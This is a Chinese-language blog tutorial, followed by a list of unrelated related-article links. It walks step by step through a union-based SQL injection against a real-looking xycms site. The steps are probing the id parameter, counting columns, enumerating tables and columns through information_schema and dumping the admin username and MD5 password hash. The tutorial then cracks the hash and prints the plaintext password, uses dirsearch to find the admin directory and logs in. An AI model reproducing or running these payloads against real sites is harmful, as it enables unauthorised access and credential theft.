xycms登录后台详细教程(php+mysql)
xycms搭建过程省略.....
首页界面
在网站查找注入点,也就是可能会和数据库有交互的地方,?id=13可知此处可能与数据库有交互,之后在此处进行测试
测试
1 and 1=1 1 and 1=2 //int型注入
1’ and 1=1# 1’ and 1=2# //char型注入
可知为int型注入,char型就不进行测试了
order by 列数 //查看数据的列数,常用二分法
order by 10 //正常显示 order by 11 //不正常显示
所以得知是10列,
id=13 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 //联合查询,后面的数字有跟前上一步结果输入
这时会有数字显示在页面上,这些都是注入点,根据回显情况我们可以让我们想要的数据回显在页面上,
这里我选择数字10这个位置
id=13 and 1=2 union select 1,2,3,4,5,6,7,8,9,database() //查看当前数据库为xycms
and 1=2 union select 1,2,3,4,5,6,7,8,9,table_name from information_schema.tables where table_schema='xycms' //获取表名
and 1=2 union select 1,2,3,4,5,6,7,8,9,table_name from information_schema.tables where table_schema='xycms' limit 1,1 //获取第二张表名
一个数据库肯定不止一张表 limit 2,1 //表3 limit 3,1 //表4......以此类推
and 1=2 union select 1,2,3,4,5,6,7,8,9,column_name from information_schema.columns where table_name='common' limit 0,1 //获取表common列名1
同样的不止一张表 limit 1,1 (列2 ).....
and 1=2 union select 1,2,3,4,5,6,7,8,9,id from common //获取ID信息
同样不止一个ID,可以加limit
通过以上的方法一个一个查询可以找到表为manage_user下有列名为m_name和m_pwd
and 1=2 union select 1,2,3,4,5,6,7,8,9,concat(m_name,'---',m_pwd) from manage_user
//查找用户名和密码(同样也不止一组)
admin111---24FBF59E4D9CC107F6CD64838EF63F98
密码是md5加密,在线md5加解密
admin111---qazxsw111
我们已经拿到账号密码,现在就是找后台登录界面
敏感目录扫描工具:dirsearch(百度网盘下载,提取码:bmxx)
环境:python
工具下载完成后,找到目录并在当前目录下打开cmd,
python dirsearch.py -u "扫描的url地址" -e *
python dirsearch.py -u "http://www.cjl.xycms.com/" -e * //扫描敏感目录
主要看状态码为200的,状态码200为访问成功,看到一些比较像登录后台系统的文件目录,都尝试访问一下
最后通过system这个目录登录
输入刚刚获得的账号密码admin111---qazxsw111,登录成功。
xycms登录后台详细教程(php+mysql)相关推荐
- Discuz!x3.4 QQ互联跳过完善资料直接登录(详细教程方法)
Discuz!x3.4 QQ互联跳过完善资料直接登录(详细教程方法) 有很多人都为QQ互联的问题困扰,最近我正在研究QQ登录怎么才能避开完善信息直接登录的问题,结果经过几天的反复测验终于被我找到了方法 ...
- Linux查看和剔除当前登录用户详细教程
Linux查看和删除当前登录用户详细教程 文章目录: 一.`w`命令查看登录用户正在使用的进程信息 二.`who`命令查看当前正在登陆的用户 三.`last`查看登陆用户的历史信息 四.`pkill` ...
- 青龙面板最新版本2.10.11+(诺兰短信登录)nvjdc详细教程
懒人上车链接:点击这里上车 懒人验证码登录链接:点这里 青龙面板安装教程传送门:传送门 1:青龙面板自行安装(上面已经给出教程) 2:安装解压程序(一般服务器都已经安装了,提示找不到命令可以安装) y ...
- PHP app登录qq,APP配置QQ登录的详细教程
之前教程不够详细,很多人的APP不能正常使用QQ登录.现在重新整理了一个教程.大家可以参考配置. 为了避免重复注册帐号,安卓APP只能共用网站的QQ登录接口,这就需要你得重新为他申请APP的相关登录接 ...
- 2023年微信小程序获取手机号授权登录注册详细教程,包含服务端教程
前言 小程序中有很多地方都会用到用户的手机号,比如登陆注册,填写收货地址等等.有了这个组件可以快速获取微信绑定手机号码,无须用户填写. 网上大多数教程还是往年的,而微信官方的api已做了修改.本篇文章 ...
- linux更换文件夹底色,ubuntu18.04系统修改登录背景详细教程
如下图,这是一个macOS风格的登录背景,还带虚化效果的.我们将在本文详细讲解在ubuntu18.04系统中修改登录背景的方法. 安装帮助原文(英文,下载包请看下面的中文注解): Descriptio ...
- Windows Server 2012开启远程桌面服务及授权多终端用户同时登录的详细教程
一.前言 本教程适用于Windows Server 2012 R2系统版本: 本教程适用的情景为:需要对服务器开启长期.稳定.且不限制连接数的远程功能,即多用户.多终端可以同时远程登录到这一台服务器中 ...
- 微信扫码登录超详细教程
一.OAuth2 1.OAuth2介绍 2.OAuth2解决什么问题 (1)OAuth2提出的背景 照片拥有者想要在云冲印服务上打印照片,云冲印服务需要访问云存储服务上的资源.(2)图例 资源 ...
- QQ第三方登录的详细教程
这次说一下我自己第一次使用QQ第三方登录的过程 1 .我们开始需要在开发者网站上注册,http://open.qq.com/ 进入这个网站后点应用接入中的应用接入(因为那个按不动),开始注册,这个注册 ...
最新文章
- scala可变长度参数函数
- SAP QM 在Quality Notification里维护Internal Note
- 【已解决】mysql连接出错:ERROR 1040 (HY000): Too many connections
- java 垃圾回收 指针_Java 和 C++ 垃圾回收之间的差别
- 迁移学习领域自适应:具有类间差异的联合概率最大平均差异
- 2015-03-18 current note update logic in my task
- .NET CORE(C#) WPF亚克力窗体
- 同事用Excel花了半小时做甘特图,我用一工具只用10分钟
- gpt分区安装的Win7激活工具
- 网吧服务器磁盘性能,网吧游戏服务端显示磁盘已满怎么解决
- 打开word出现自动化automation错误、Microsoft visual basic 运行时错误
- matlab 创建批量文件夹_如何在Mac上为照片加水印?水印照片怎样批量处理?
- 日志数据如何同步到MaxCompute
- 9个最佳的大数据处理编程语言
- 孙宇晨:90后的倔强
- 【Mac 环境配置】--安装git及使用
- Ubuntu 16.04 android 5.1编译错误
- 手把手教你打印出PDF(fpdf的简单应用)
- 假若重新度过大学四年。。
- 数据结构的那些“事”